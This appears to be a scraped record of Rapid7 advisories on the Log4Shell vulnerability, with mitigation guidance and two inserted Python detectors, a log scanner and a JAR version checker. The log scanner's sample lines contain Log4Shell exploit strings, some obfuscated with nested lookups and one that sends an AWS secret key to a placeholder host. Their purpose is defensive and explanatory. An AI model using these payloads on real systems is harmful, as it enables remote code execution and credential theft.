authorization, it is absolutely fine to scan to identify vulnerable applications or systems \u2013 in fact, we strongly recommend you do so in your own environments so you can get patching.\n\nBeyond that, while laws vary by country, most anti-hacking laws revolve around not exceeding authorized access or accessing systems without authorization, so scanning someone else\u2019s assets without permission may fall foul of the law.\n\nFor example, as our resident US public policy expert, Harley Geiger, explains in [this tweet,](<https://twitter.com/HarleyGeiger/status/1471205153273438211?s=20>) under the US anti-hacking law, the Computer Fraud and Abuse Act (CFAA), \u201cIf the test involves unauthorized exfiltration of 
nonpublic data from a target system or causes a target system to download your executable code w/o authorization, even if done in good faith, stop & make friends w a lawyer.\u201d\n\n \n\n\n#### Get more critical insights about defending against Log4Shell\n\n[Check out our resource center](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T19:44:42", "type": "rapid7blog", "title": "The Everyperson\u2019s Guide to Log4Shell (CVE-2021-44228)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-45046"], "modified": "2021-12-15T19:44:42", "id": "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "href": "https://blog.rapid7.com/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-03T23:06:28", "description": "### Table of Contents\n\n * \n\nOverview\n\n * Affected versions\n\n * Mitigation and detection guidance\n\n * Rapid7 customers\n\n * InsightVM and Nexpose\n\n * InsightIDR and 
Managed Detection and Response\n\n * Velociraptor\n\n * tCell\n\n * InsightCloudSec\n\n * IntSights\n\n * Attacks and campaigns\n\n * External resources\n\n * Updates\n\n* * *\n\n**Need clarity on detecting and mitigating the Log4j vulnerability? Visit our [Log4Shell Resource Center](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>).**\n\n_Rapid7 is continuously monitoring our environment for Log4Shell vulnerability instances and exploit attempts. At this time, we have not detected any successful exploit attempts in our systems or solutions. For further information and updates about our internal response to Log4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2021/12/14/update-on-log4shells-impact-on-rapid7-solutions-and-systems/>)._\n\n_Information and exploitation of this vulnerability are evolving quickly. We will update this blog with further information as it becomes available._ \n \n\n\n## Overview\n\nCVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-44228 | [Apache Advisory](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>) | [AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228/rapid7-analysis?referrer=blog>) | Authenticated, remote, and agent checks are available in InsightVM, along with Container Security assessment. | Immediately (emergency) | January 3, 2022 5:15 PM ET \n \n\n\nOn December 6, 2021, Apache [released](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>) version 2.15.0 of their Log4j framework, which included a fix for [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228>), a critical (CVSSv3 10) remote code execution (RCE) vulnerability affecting Apache Log4j 2.14.1 and earlier versions. The vulnerability resides in the way specially crafted log messages were handled by the Log4j processor. Untrusted strings (e.g. 
those coming from input text fields, such as web application search boxes) containing content like `${jndi:ldap://example.com/a}` would, when message lookup substitution was enabled, be evaluated as a JNDI lookup: the JVM contacts the attacker-controlled LDAP server named in the string, loads the class it points to, and executes it. On December 13, 2021, Apache released Log4j 2.16.0, which removes message lookups entirely and disables JNDI access by default.\n\nSuccessful exploitation of CVE-2021-44228 can allow a remote, unauthenticated attacker to take full control of a vulnerable target system. CVE-2021-44228 is being [broadly](<https://twitter.com/GreyNoiseIO/status/1469326260803416073>) and [opportunistically](<https://twitter.com/balgan/status/1469313802235752454?s=21>) exploited in the wild as of December 10, 2021. Multiple sources have noted both scanning and exploit attempts against this vulnerability. Rapid7 researchers have developed and tested a proof-of-concept exploit that works against the latest Struts2 Showcase (2.5.27) running on Tomcat. We expect attacks to continue and increase: Defenders should invoke emergency mitigation processes as quickly as possible. CISA has also published [an alert](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce>) advising immediate mitigation of CVE-2021-44228.\n\nA huge swath of products, frameworks, and cloud services implement Log4j, which is a popular Java logging library. 
Organizations should be prepared for a continual stream of downstream advisories from third-party software producers who include Log4j among their dependencies.\n\n## Affected versions\n\nAccording to [Apache\u2019s advisory](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>), **all** Apache Log4j (version 2.x) versions up to 2.14.1 are vulnerable if message lookup substitution was enabled.\n\n## Mitigation and detection guidance\n\nSecurity teams and network administrators should update to Log4j 2.17.0 immediately, invoking **emergency** patching and/or incident response procedures to identify affected systems, products, and components and remediate this vulnerability with the highest level of urgency. They should also monitor web application logs for evidence of attempts to execute methods from remote codebases (i.e. looking for `jndi:ldap` strings, keeping in mind that attackers also use `jndi:rmi` and `jndi:dns` and hide the keyword behind nested lookups such as `${${lower:j}ndi:...}`, so a literal match on `jndi:ldap` alone will miss attempts) and local system events on web application servers executing `curl` and other, known remote resource collection command line programs. Furthermore, we recommend paying close attention to security advisories mentioning Log4j and prioritizing updates for those solutions.\n\nAccording to [Apache\u2019s advisory for CVE-2021-44228](<https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.15.0>), the behavior that allows for exploitation of the flaw has been disabled by default starting in version 2.15.0. Apache later updated their advisory to note that the fix for CVE-2021-44228 was incomplete in certain non-default configurations. CVE-2021-45046 has been issued to track the incomplete fix, and both vulnerabilities have been mitigated in Log4j 2.16.0. 
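The advice above to look for `jndi:ldap` in logs needs a normalization step to be useful against what is actually being sent: attackers wrap each character of `jndi` in nested lookups such as `${lower:j}` or `${::-j}`, which Log4j resolves before the JNDI lookup fires but which defeat a literal string match. The Python below is an added example for this page, not code from the Rapid7 post or from the Log4j project. It evaluates the obfuscation-only lookups (`lower`, `upper` and the `:-` default syntax) the way Log4j would, leaves runtime-dependent lookups in place, then matches on the normalized text, reports the JNDI protocol, and lists embedded `${env:...}`-style lookups that leak host data over the outbound request. The access-log lines are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines for this example (not from the original
# post): a benign request, a plain Log4Shell probe in the User-Agent, a probe
# obfuscated with nested lookups in the query string, and an attempt to leak an
# AWS secret through a DNS lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:03:02 +0000] "GET /?x=${${lower:j}${upper:n}${::-d}${::-i}:${lower:rmi}://203.0.113.9:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.203.0.113.9.example}"',
]

# An innermost lookup is a ${...} whose body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)
# Lookups attackers nest inside the JNDI URL to leak host data.
LEAK_LOOKUP = re.compile(r"\$\{(env|sys|java|ctx|hostName|main|bundle|date):([^${}]*)\}", re.IGNORECASE)
FROZEN = "\x00{"  # marks lookups we cannot evaluate so the loop in normalize() terminates


def resolve_lookup(body: str) -> Optional[str]:
    """Evaluate the lookups that only serve obfuscation, as Log4j would.

    Returns the substituted text, or None for lookups that need runtime data
    (jndi, env, sys, ...) and therefore stay in place for the detector."""
    name, _, arg = body.partition(":")
    if name.lower() == "lower":
        return arg.lower()
    if name.lower() == "upper":
        return arg.upper()
    if ":-" in body:  # ${key:-default}: an unknown key yields the default, so ${::-j} is "j"
        return body.rsplit(":-", 1)[1]
    return None


def normalize(text: str) -> str:
    """Substitute innermost lookups from the inside out until nothing changes."""
    def substitute(match) -> str:
        resolved = resolve_lookup(match.group(1))
        return resolved if resolved is not None else FROZEN + match.group(1) + "}"

    previous = None
    while previous != text:
        previous = text
        text = INNERMOST_LOOKUP.sub(substitute, text)
    return text.replace(FROZEN, "${")


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Return detection details for one log line, or None if it is clean."""
    if "${" not in line:
        return None
    normalized = normalize(line)
    match = JNDI_LOOKUP.search(normalized)
    if match is None:
        return None
    return {
        "protocol": match.group(1).lower(),
        "obfuscated": "${jndi:" not in line.lower(),  # a literal filter alone would have missed it
        "leaks": [f"{m.group(1)}:{m.group(2)}" for m in LEAK_LOOKUP.finditer(normalized)],
        "normalized": normalized,
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run the detector over a sequence of log lines, keeping 1-based line numbers."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = analyze_line(line)
        if hit is not None:
            hit["line_no"] = number
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: jndi:{hit['protocol']} obfuscated={hit['obfuscated']} leaks={hit['leaks']}")
```

Run it over real access or application logs one line at a time; the `obfuscated` flag shows which hits a plain `${jndi:` filter would have missed, and `leaks` tells you which secrets to rotate.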
An additional Denial of Service (DoS) vulnerability, CVE-2021-45105, was later fixed in version 2.17.0 of Log4j.\n\n * In releases >=2.10, this behavior can be mitigated by setting either the system property `log4j2.formatMsgNoLookups` or the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS` to `true`.\n * For releases >=2.7 and <=2.14.1, all `PatternLayout` patterns can be modified to specify the message converter as `%m{nolookups}` instead of just `%m`.\n * For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.\n\nJava 8u121 (see <https://www.oracle.com/java/technologies/javase/8u121-relnotes.html>) protects against RCE by defaulting `com.sun.jndi.rmi.object.trustURLCodebase` and `com.sun.jndi.cosnaming.object.trustURLCodebase` to `false`.\n\nAccording to a [translated technical blog post](<https://www-cnblogs-com.translate.goog/yyhuni/p/15088134.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US>), JDK versions 6u211, 7u201, 8u191, 11.0.1 and later also set `com.sun.jndi.ldap.object.trustURLCodebase` to `false`, meaning JNDI cannot load a remote codebase over LDAP. Note that this only blocks the remote class-loading path: a malicious LDAP server can instead return a serialized Java object (`javaSerializedData`) that is deserialized locally, so an exploitable gadget chain on the application's classpath can still lead to code execution, and lookups such as `${env:...}` embedded in the JNDI URL still leak data through the outbound LDAP or DNS request. A newer JDK is defense in depth, not a substitute for updating Log4j. 
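Whether a given log4j-core is actually affected comes down to two things the mitigations above turn on: its version, and whether `JndiLookup.class` is still inside the JAR. The JAR is also often buried inside a WAR, EAR or fat JAR rather than sitting in a lib directory. The Python below is an added example for this page, not Rapid7's or Apache's tooling: it reads the version from the Maven `pom.properties` that log4j-core ships, checks for the class, recurses into nested archives, and classifies each hit using the version thresholds stated above (2.15.0 incomplete, 2.16.0 fixed for CVE-2021-44228/CVE-2021-45046, 2.17.0 for CVE-2021-45105, plus the 2.3.1/2.12.2/2.12.3 backports). The sample archives are built in memory with placeholder bytes and are not real Log4j builds.

```python
import io
import os
import re
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
BACKPORT_RELEASES = {(2, 3, 1), (2, 12, 2), (2, 12, 3)}  # security backports excluded from the CVE


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (every 2.0 pre-release is affected anyway)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return None if match is None else (int(match.group(1)), int(match.group(2)), int(match.group(3) or 0))


def classify(version: Optional[Tuple[int, int, int]], jndi_lookup_present: bool) -> str:
    """Map (log4j-core version, JndiLookup.class present?) to a remediation status."""
    if version is None:
        return "unknown version: JndiLookup.class present but no log4j-core pom.properties, inspect manually"
    if version in BACKPORT_RELEASES:
        return "backport release: not affected by CVE-2021-44228"
    if version >= (2, 17, 0):
        return "patched (2.17.0 or later)"
    if version >= (2, 16, 0):
        return "fixed for CVE-2021-44228/CVE-2021-45046; upgrade to 2.17.0 for CVE-2021-45105"
    if not jndi_lookup_present:  # the `zip -q -d` mitigation was applied to a vulnerable build
        return "mitigated: JndiLookup.class removed, still upgrade to 2.17.0"
    if version >= (2, 15, 0):
        return "incomplete fix (CVE-2021-45046): upgrade to 2.17.0"
    return "VULNERABLE: CVE-2021-44228, upgrade to 2.17.0 or remove JndiLookup.class now"


def assess_archive(data: bytes, name: str) -> List[Dict[str, object]]:
    """Inspect one archive, recursing into archives nested inside it (fat JARs, WARs, EARs)."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        entries = set(archive.namelist())
        pom = archive.read(POM_PROPERTIES).decode("utf-8", "replace") if POM_PROPERTIES in entries else ""
        version = next((parse_version(line.split("=", 1)[1]) for line in pom.splitlines()
                        if line.startswith("version=")), None)
        present = JNDI_LOOKUP_CLASS in entries
        if version is not None or present:
            findings.append({"archive": name, "version": version, "jndi_lookup_present": present,
                             "status": classify(version, present)})
        for entry in sorted(entries):
            if entry.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    findings.extend(assess_archive(archive.read(entry), f"{name}!{entry}"))
                except zipfile.BadZipFile:
                    pass  # named like an archive but not one
    return findings


def scan_directory(root: str) -> List[Dict[str, object]]:
    """Assess every archive under a directory tree, e.g. an application server's lib folders."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in filenames if f.lower().endswith(ARCHIVE_SUFFIXES)):
            try:
                with open(path, "rb") as handle:
                    findings.extend(assess_archive(handle.read(), path))
            except (OSError, zipfile.BadZipFile):
                pass  # unreadable, or named like an archive but not one
    return findings


def build_sample_jar(version: Optional[str], include_jndi_lookup: bool,
                     nested: Optional[Dict[str, bytes]] = None) -> bytes:
    """Construct a stand-in archive in memory; the class entry is four magic bytes, not real bytecode."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        if version is not None:
            archive.writestr(POM_PROPERTIES,
                             f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            archive.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
        for entry_name, entry_bytes in (nested or {}).items():
            archive.writestr(entry_name, entry_bytes)
    return buffer.getvalue()


# Constructed samples: unpatched, class stripped with `zip -q -d`, the incomplete 2.15.0 fix,
# a patched 2.17.0, and a WAR bundling the unpatched JAR under WEB-INF/lib.
SAMPLE_ARCHIVES = {
    "log4j-core-2.14.1.jar": build_sample_jar("2.14.1", True),
    "log4j-core-2.14.1-stripped.jar": build_sample_jar("2.14.1", False),
    "log4j-core-2.15.0.jar": build_sample_jar("2.15.0", True),
    "log4j-core-2.17.0.jar": build_sample_jar("2.17.0", True),
}
SAMPLE_ARCHIVES["app.war"] = build_sample_jar(
    None, False, nested={"WEB-INF/lib/log4j-core-2.14.1.jar": SAMPLE_ARCHIVES["log4j-core-2.14.1.jar"]})


if __name__ == "__main__":
    for sample_name, sample_data in SAMPLE_ARCHIVES.items():
        for finding in assess_archive(sample_data, sample_name):
            print(f"{finding['archive']}: {finding['status']}")
```

Point `scan_directory()` at an application server's installation root; a finding whose path contains `!` names the nested archive that carries log4j-core, which is the one the `zip -q -d` command or the upgrade has to reach. The class check matters only for versions below 2.16.0, since patched releases still ship `JndiLookup.class` with JNDI disabled.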
Rapid7 researchers are working to validate that upgrading to higher JDK/JRE versions does fully mitigate attacks.\n\nRapid7 Labs, Managed Detection and Response (MDR), and tCell teams recommend filtering any inbound request that contains the string \u201c`${jndi:`\u201d and monitoring all application and web server logs for similar strings.\n\nEmerging Threats (ET Labs) has [made Suricata and Snort IDS coverage](<https://twitter.com/ET_Labs/status/1469339963871354884?s=20>) for known exploit paths of CVE-2021-44228.\n\nResearchers are maintaining a [public list of known affected vendor products and third-party advisories](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>) related to the Log4j vulnerability.\n\n## Rapid7 customers\n\n### InsightVM and Nexpose\n\n[Update: December 17, 2021 4:50pm ET]\n\n**Authenticated and Remote Checks** \nInsightVM version 6.6.121 supports authenticated scanning for Log4Shell on Linux and Windows systems. After installing the product updates, restart your console and engine.\n\n * **Unix and Windows:** `apache-log4j-core-cve-2021-44228` authenticated vulnerability check performs a complete file system search for vulnerable versions of Log4j on Linux and Windows systems. 
Windows file system search must be enabled in the scan template for the authenticated check to run in Windows environments.\n * **Windows, Linux, Mac:** `apache-log4j-core-cve-2021-44228-remote` unauthenticated vulnerability check attempts to trigger a connection back to the scan engine to determine vulnerability.\n\nVersion 6.6.121 also includes the ability to disable remote checks.\n\n**Agent checks** \n[Insight Agent version 3.1.2.36](<https://docs.rapid7.com/release-notes/insightagent/20211212/>) was released on December 12, 2021 and includes collection support for Log4j JAR files on **Mac and Linux** systems so that vulnerability assessments of the authenticated check for CVE-2021-44228 will work for updated Agent-enabled systems.\n\nInsight Agent collection on **Windows** for Log4j began rolling out in version 3.1.2.38 as of December 17, 2021. It will take several days for this roll-out to complete.\n\n * If you are using the Insight Agent to assess your assets for vulnerabilities and you are not yet on version 3.1.2.38, you can uncheck the \u201c[Skip checks performed by the Agent](<https://docs.rapid7.com/insightvm/enable-complementary-scanning-for-scan-engines-and-insight-agents/>)\u201d option in the scan template to ensure that authenticated checks run on Windows systems.\n * If you rely on the Insight Agent for vulnerability management, consider setting the Throttle level to High (which is the default) to ensure updates are applied as quickly as possible.\n\n**Containers** \nInsightVM customers utilizing [Container Security](<https://www.rapid7.com/products/insightvm/features/container-security/>) can assess containers that have been built with a vulnerable version of the library.\n\n### InsightIDR and Managed Detection and Response\n\nRapid7 InsightIDR has several detections that will identify common follow-on activity used by attackers. 
Additionally, our teams are reviewing our detection rule library to ensure we have detections based on any observed attacker behavior related to this vulnerability seen by our Incident Response (IR), MDR, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors.\n\n * [Update: December 10, 2021 3:30pm ET] \n * Our Threat Detection & Response team has deployed detection rules to help identify attacker behavior related to this vulnerability: \n * Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port\n * Suspicious Process - Curl or WGet Pipes Output to Shell\n * We also identified an existing detection rule that was providing coverage prior to identification of the vulnerability: \n * Suspicious Process - Curl to External IP Address\n * [Update: December 10, 2021 7:00pm ET] \n * An additional rule has been deployed: \n * Attacker Technique - Curl Or WGet To External IP Reporting Server IP In URL\n\n### Velociraptor\n\nA [Velociraptor artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/log4jrce/>) has been added that can be used to hunt against an environment for exploitation attempts against the log4j RCE vulnerability. A second [Velociraptor artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/log4jrcehash/>) that looks for certain known-vulnerable JAR files was also added on December 12, 2021. 
A third [Velociraptor artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/log4jrce_jndilookup/>) is now available and will run Yara rules across JAR files and report on the vulnerable class.\n\n### tCell\n\nAlong with the guidance below, our tCell team has a new, [longer blog post](<https://www.rapid7.com/blog/post/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/>) on these detections and how to use them to safeguard your applications.\n\n***New* Pattern update for monitoring rule**\n\nFor tCell customers, we have updated our AppFirewall patterns to detect log4shell. This means customers can view monitoring events in the App Firewall feature of tCell should log4shell attacks occur.\n\n***New* Default pattern to configure a block rule**\n\nIn order to protect your application against any exploit of Log4j, we\u2019ve added a default pattern (**tc-cdmi-4**) for customers to block against. Below is the video on how to set up this custom block rule (don\u2019t forget to deploy!), or reach out to the tCell team if you need help with this. As research continues and new patterns are identified, they will automatically be applied to **tc-cdmi-4** to improve coverage.\n\n\n\n**Identify vulnerable packages and enable OS Commands**\n\ntCell will alert you if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as **CVE 2021-44228**) are loaded by the application.\n\ntCell Customers can also enable blocking for [OS commands](<https://docs.rapid7.com/tcell/os-commands>). This will prevent a wide range of exploits leveraging things like curl, wget, etc. Please note, for those customers with apps that have executables, ensure you\u2019ve included it in the policy as allowed, and then enable blocking.\n\n### InsightCloudSec\n\nThe InsightCloudSec and InsightVM integration will identify cloud instances which are vulnerable to CVE-2021-44228 in InsightCloudSec. 
Customers can use the context and enrichment of ICS to identify instances which are exposed to the public or attached to critical resources. \n\nApplying two Insight filters \u2014 `Instance Vulnerable To Log4Shell` and `Instance On Public Subnet Vulnerable To Log4Shell` \u2014 will enable identification of publicly exposed vulnerable assets and applications.\n\nInsightCloudSec Filters for Log4J/Log4Shell Vulnerabilities \n\n\n### IntSights\n\nIntSights researchers [have provided a perspective](<https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/>) on what's happening in criminal forums with regard to Log4Shell and will continue to track the attacker's-eye view of this new attack vector.\n\n## Attacks and campaigns\n\nRapid7 Labs is now maintaining a [regularly updated list of unique Log4Shell exploit strings](<https://github.com/rapid7/data/blob/master/log4shell/heisenberg/exploit-strings.txt>) as seen by Rapid7's Project Heisenberg.\n\nBitdefender has details of [attacker campaigns](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) using the Log4Shell exploit for Log4j. 
Their technical advisory noted that the Muhstik Botnet and XMRIG miner have incorporated Log4Shell into their toolsets, and they have also seen the Khonsari ransomware family adapted to use Log4Shell code.\n\n## External resources\n\nThe following resources are not maintained by Rapid7 but may be of use to teams triaging Log4j/Log4Shell exposure.\n\nCISA [now maintains a list of affected products/services](<https://github.com/cisagov/log4j-affected-db>) that is updated as new information becomes available.\n\nCISA also has [posted a dedicated resource page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for Log4j info aimed mostly at Federal agencies, but it consolidates and contains information that will be of use to protectors in any organization.\n\nShadowServer is a non-profit organization that offers [free Log4Shell exposure reports to organizations](<https://www.shadowserver.org/news/log4j-scanning-and-cve-2021-44228-exploitation-latest-observations-2021-12-16/>).\n\nNCSC NL maintains a regularly updated list of [Log4j/Log4Shell triage and information resources](<https://github.com/NCSC-NL/log4shell>).\n\n## Updates\n\n[December 10, 2021, 5:45pm ET] \nRapid7 has posted a technical analysis of [CVE-2021-44228 on AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228/rapid7-analysis?referrer=blog>).\n\n[December 11, 2021, 11:15am ET] \nAdded additional resources for reference and minor clarifications.\n\n[December 11, 2021, 4:30pm ET] \nVMware has [published an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) listing 30 different VMware products vulnerable to CVE-2021-44228, including vCenter Server, Horizon, Spring Cloud, Workspace ONE Access, vRealize Operations Manager, and Identity Manager. 
Their response matrix lists available workarounds and patches, though most are pending as of December 11.\n\nRapid7 has observed indications from the research community that they have already begun investigating RCE exploitability for products that sit in critical places in corporate networks, including network infrastructure solutions like vCenter Server. **VMware customers should monitor [this list](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) closely and apply patches and workarounds on an emergency basis as they are released.**\n\n[December 11, 2021, 10:00pm ET] \n**Apache Struts 2 Vulnerable to CVE-2021-44228** \nThe Apache Struts 2 framework contains static files (Javascript, CSS, etc) that are required for various UI components. Finding and \u201cserving\u201d these components is handled by the Struts 2 class [DefaultStaticContentLoader](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/dispatcher/DefaultStaticContentLoader.html>). The `DefaultStaticContentLoader` is vulnerable to Log4j CVE-2021-44228; \ngiven the default static content, basically all Struts implementations should be trivially vulnerable. Rapid7's vulnerability research team has technical analysis, a simple proof-of-concept, and an example log artifact [available in AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>).\n\n[December 12, 2021, 2:20pm ET] \nInsightVM and Nexpose customers can now assess their exposure to CVE-2021-44228 with an authenticated vulnerability check. Note that this check requires that customers update their product version and restart their console and engine. 
See the `Rapid7 customers` section for details.\n\n[December 13, 2021, 10:30am ET] \nUpdated mitigations section to include new guidance from Apache Log4J team and information on how to use InsightCloudSec + InsightVM to help identify vulnerable instances.\n\n[December 13, 2021, 2:40pm ET] \nRapid7 researchers have confirmed and demonstrated that essentially all vCenter Server instances are trivially exploitable by a remote, unauthenticated attacker. Technical analysis, proof-of-concept code, and indicators of compromise for this vector are [available in AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>).\n\n[December 13, 2021, 4:00pm ET] \ntCell customers can now view events for log4shell attacks in the App Firewall feature. Additionally, customers can set a block rule leveraging the default tc-cdmi-4 pattern.\n\n[December 13, 2021, 6:00pm ET] \nWe received some reports of the remote check for InsightVM not being installed correctly when customers were taking in content updates. Product version 6.6.119 was released on December 13, 2021 at 6pm ET to ensure the remote check for CVE-2021-44228 is available and functional. Customers will need to update and restart their Scan Engines/Consoles.\n\n[December 13, 2021, 8:15pm ET] \nInformation on Rapid7's response to Log4Shell and the vulnerability's impact to Rapid7 solutions and systems is [now available here](<https://www.rapid7.com/blog/post/2021/12/14/update-on-log4shells-impact-on-rapid7-solutions-and-systems/>).\n\n[December 14, 2021, 08:30 ET] \nApache has released [Log4j 2.16](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0>). This disables the Java Naming and Directory Interface (JNDI) by default and requires `log4j2.enableJndi` to be set to true to allow JNDI. It also completely removes support for Message Lookups, a process that was started with the prior update. 
It mitigates the weaknesses identified in the newly released [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>).\n\nRapid7 has posted resources to assist InsightVM and Nexpose customers in scanning for this vulnerability. [This post](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>), \u201cUsing InsightVM to Find Apache Log4j CVE-2021-44228\u201d goes into detail on how the scans work and includes a SQL query for reporting. For product help, we have added [documentation](<https://docs.rapid7.com/insightvm/apache-log4j/>) with step-by-step information to scan and report on this vulnerability.\n\n[December 14, 2021, 2:30 ET] \nAlong with Log4Shell, we also have [CVE-2021-4104](<https://access.redhat.com/security/cve/CVE-2021-4104>) \u2014 reported on December 9, 2021 \u2014 a flaw in the Java logging library Apache Log4j in version 1.x: JMSAppender is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to connect to the attacker's JMS Broker. 
Note this flaw only affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write-access to the Log4j configuration for adding JMSAppender to the attacker's JMS Broker.\n\n[December 14, 2021, 3:30 ET] \nCISA has [posted a dedicated resource page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for Log4j info aimed mostly at Federal agencies, but it consolidates and contains information that will be of use to protectors in any organization.\n\nRapid7 Labs is now maintaining a [regularly updated list of unique Log4Shell exploit strings](<https://github.com/rapid7/data/blob/master/log4shell/heisenberg/exploit-strings.txt>) as seen by Rapid7's Project Heisenberg.\n\n[December 14, 2021, 4:30 ET] \nAdded a section (above) on what our IntSights team is seeing in criminal forums on the Log4Shell exploit vector.\n\n[December 15, 2021, 09:10 ET] \nAdded a new section to track active attacks and campaigns. See above for details on a new ransomware family incorporating Log4Shell into their repertoire.\n\n[December 15, 2021, 10:00 ET] \nAlong with the guidance below, our tCell team has a new, [longer blog post](<https://www.rapid7.com/blog/post/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/>) on these detections and how to use them to safeguard your applications.\n\n[December 15, 2021 6:30 PM ET] \nApache has fixed an additional vulnerability, CVE-2021-45046, in Log4j version 2.16.0 to address an incomplete fix for CVE-2021-44228 in certain non-default configurations. Apache's security bulletin now advises users that they must upgrade to 2.16.0 to fully mitigate CVE-2021-44228. InsightVM and Nexpose customers can assess their exposure to CVE-2021-45046 with an authenticated (Linux) check.\n\nApache also appears to have updated their 